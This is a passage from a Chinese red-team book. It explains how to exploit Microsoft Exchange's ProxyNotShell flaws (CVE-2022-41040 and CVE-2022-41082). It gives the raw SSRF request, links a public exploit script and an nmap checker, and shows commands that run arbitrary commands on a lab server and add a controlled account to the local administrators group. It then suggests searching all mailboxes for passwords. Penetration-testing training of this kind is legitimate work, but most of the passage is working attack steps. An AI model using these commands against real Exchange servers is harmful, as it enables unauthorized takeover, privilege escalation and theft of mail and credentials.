本文选自《内网安全攻防:红队之路》
在渗透测试过程,如果目标环境存在Exchange服务器,我们也需要测试是否存在已知的远程命令执行漏洞,这里首先介绍ProxyNotShell。
ProxyNotShell和之前的ProxyShell一样,也是将几个漏洞组合起来使用,分别为CVE-2022-41040和CVE-2022-41082。
ProxyNotShell利用链的第一个漏洞为CVE-2022-41040,该漏洞为Exchange Autodiscover前端中的一个无需认证的SSRF漏洞,攻击者可利用该漏洞以LocalSystem权限向后端的任意URL发送数据。下面为POC:
GET /autodiscover/autodiscover.json?@zdi/PowerShell?serializationLevel=Full;ExchClientVer=15.2.922.7;clientApplication=ManagementShell;TargetServer=;PSVersion=5.1.17763.592&Email=autodiscover/autodiscover.json%3F@zdi HTTP/1.1
Host: 192.168.3.12
Authorization: Basic ZGF2ZTpQYXNzdzByZEAwMg==
Connection: close
ProxyNotShell利用链的第二个漏洞为CVE-2022-41082,是存在于Exchange PowerShell后端的远程代码执行漏洞。在利用CVE-2022-41040绕过认证后,攻击者可利用CVE-2022-41082执行任意命令。
我们可以使用nmap脚本扫描目标服务器是否存在漏洞,如下图所示,脚本地址为https://github.com/CronUp/Vulnerabilidades/blob/main/proxynotshell_checker.nse:
扫描ProxyNotShell
下图输出表明目标服务器可能存在ProxyNotShell漏洞。接下来,我们进行具体的利用,PoC地址为https://github.com/testanull/ProxyNotShell-PoC(因为部分代码是从其他项目直接复制的,使用的是python2的print语法,如果使用python3运行脚本,需要修改print)。利用的前提是需要一个有效的账户和密码。
pip install requests_ntlm2 requests
python3 proxynotshell.py https://192.168.3.12 dave Passw0rd@02 'ipconfig > c:\inetpub\wwwroot\aspnet_client\ipconfig.txt'
curl -k https://192.168.3.12/aspnet_client/ipconfig.txt
ProxyNotShell利用
从下图可以看到我们成功在目标服务执行命令。我们也可以将我们控制的用户添加到目标服务器的本地管理员组:
python3 proxynotshell.py https://192.168.3.12 dave Passw0rd@02 'net localgroup administrators dev\dave /add'
ProxyNotShell添加管理员
在获得邮件服务器权限后,我们可以搜索所有邮件,来查找是否存在账户密码信息,或者其他高价值数据,也可以利用Exchange默认的一些组成员关系进行权限提升。
— 实验室旗下直播培训课程 —